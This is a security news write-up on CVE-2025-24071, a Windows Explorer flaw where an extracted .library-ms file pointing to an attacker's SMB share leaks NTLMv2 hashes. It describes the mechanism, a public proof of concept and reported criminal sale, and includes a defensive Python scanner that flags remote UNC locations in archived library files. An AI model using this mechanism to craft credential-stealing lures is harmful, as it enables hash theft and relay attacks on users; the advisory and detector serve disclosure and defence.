Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing

A significant vulnerability has been uncovered in Windows File Explorer, identified as CVE-2025-24071, which poses a serious risk by allowing attackers to extract NTLM hashed passwords with minimal user interaction. This flaw, which has been classified as high-severity, was demonstrated through a proof-of-concept exploit released by security researchers. Microsoft promptly addressed the issue in its March 2025 updates.

Microsoft Windows File Explorer Vulnerability

This vulnerability, referred to as “NTLM Hash Leak via RAR/ZIP Extraction,” takes advantage of Windows Explorer’s automatic file processing capabilities. When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and index metadata. Notably, this processing occurs without the user needing to explicitly open the extracted file.

The .library-ms file format, which is XML-based and trusted by Windows Explorer for defining library locations, includes a tag that directs to an attacker-controlled SMB server, as noted by the security researcher known as “0x6rss.” Upon extraction, Windows Explorer attempts to resolve the embedded SMB path (for example, \\192.168.1.116\shared) automatically to gather metadata. This action inadvertently triggers an NTLM authentication handshake from the victim’s system to the attacker’s server, resulting in the leakage of the victim’s NTLMv2 hash without any user interaction.

Using process monitoring tools, researchers observed that immediately after extraction, both Explorer.exe and SearchProtocolHost.exe—components of Windows’ indexing service—perform several operations on the .library-ms file:

  • CreateFile: Automatically opening the file
  • ReadFile: Accessing the file contents
  • QueryBasicInformationFile: Extracting metadata
  • CloseFile: Finalizing the file processing

Wireshark captures confirm that these actions trigger SMB communication attempts, including an NTLM authentication handshake.
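The mechanism above comes down to a library file whose location element names a remote host, and the practical defender-side check is to look for such locations inside an archive before anything is extracted. The following is an added example (not code from the article or from the researcher's proof of concept); it assumes the libraryDescription/simpleLocation/url layout of the published Windows Library Description schema, and the archive and the 192.0.2.10 address in it are constructed for the demonstration.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Constructed sample in the Library Description layout (assumed): one UNC location, one local folder.
SAMPLE_LIBRARY_MS = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\192.0.2.10\shared</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

def remote_host(location):
    r"""Host a UNC location (\\host\share) would make Explorer contact; None for local
    paths, including the \\?\ and \\.\ device-path forms."""
    m = re.match(r"^\\\\([^\\?.][^\\]*)\\", location.strip())
    return m.group(1) if m else None

def remote_locations(xml_text):
    """(url, host) pairs for every <url> element that points at a remote host.
    ElementTree does not fetch external entities, so untrusted XML is safe to parse here."""
    hits = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text:   # ignore the namespace prefix
            host = remote_host(el.text)
            if host:
                hits.append((el.text.strip(), host))
    return hits

def scan_archive(data):
    """Map each .library-ms member of a ZIP to its remote locations, without extracting."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        found = {n: remote_locations(zf.read(n).decode("utf-8", "replace"))
                 for n in zf.namelist() if n.lower().endswith(".library-ms")}
    return {n: hits for n, hits in found.items() if hits}

def sample_archive():
    """Constructed ZIP holding a harmless text file plus the sample library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "benign")
        zf.writestr("Documents.library-ms", SAMPLE_LIBRARY_MS)
    return buf.getvalue()
```

Running scan_archive(sample_archive()) reports only Documents.library-ms with its UNC location and the host Explorer would try to authenticate to; the local folder entry is ignored.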

Risk Factors / Details

Affected Products: Microsoft Windows (specifically Windows File Explorer)

Impact:
  • Leaks victim’s NTLMv2 credentials, enabling pass-the-hash attacks
  • Potential for offline NTLM hash cracking
  • Creates a spoofing vulnerability

Exploit Prerequisites:
  • User must extract a specially crafted .library-ms file
  • Attacker needs to set up an SMB server to receive the authentication request

CVSS 3.1 Score: 7.5 (Important)

PoC Exploitation

This vulnerability exposes sensitive information to unauthorized parties, facilitating network spoofing attacks. On March 16, 2025, the researcher known as 0x6rss published a proof-of-concept exploit on GitHub, which includes a Python script capable of generating the malicious .library-ms file with a straightforward command: python poc.py.

Evidence suggests that this vulnerability may have been exploited in the wild prior to its public disclosure. A threat actor named “Krypt0n,” who is reportedly behind the malware known as “EncryptHub Stealer,” allegedly offered the exploit for sale on underground forums. Translated posts from the attacker reveal that they explained how to set up a local server, such as on a VPS, to capture the hashes sent from the victim’s machine. They noted that simply opening Explorer or accessing a shared folder would trigger an automatic redirect, sending the user’s hash to the attacker’s server.

Mitigation

Microsoft has addressed this vulnerability with the March 2025 Patch Tuesday updates released on March 11. All Windows users are strongly encouraged to apply these security updates without delay. This vulnerability adds to a growing list of NTLM-related issues identified in Microsoft products, with previous similar credential-leaking vulnerabilities found in applications like Microsoft Access and Publisher.

Security experts recommend that users keep all Microsoft products updated and implement additional protections against NTLM relay attacks, such as enabling SMB signing and disabling NTLM wherever feasible.
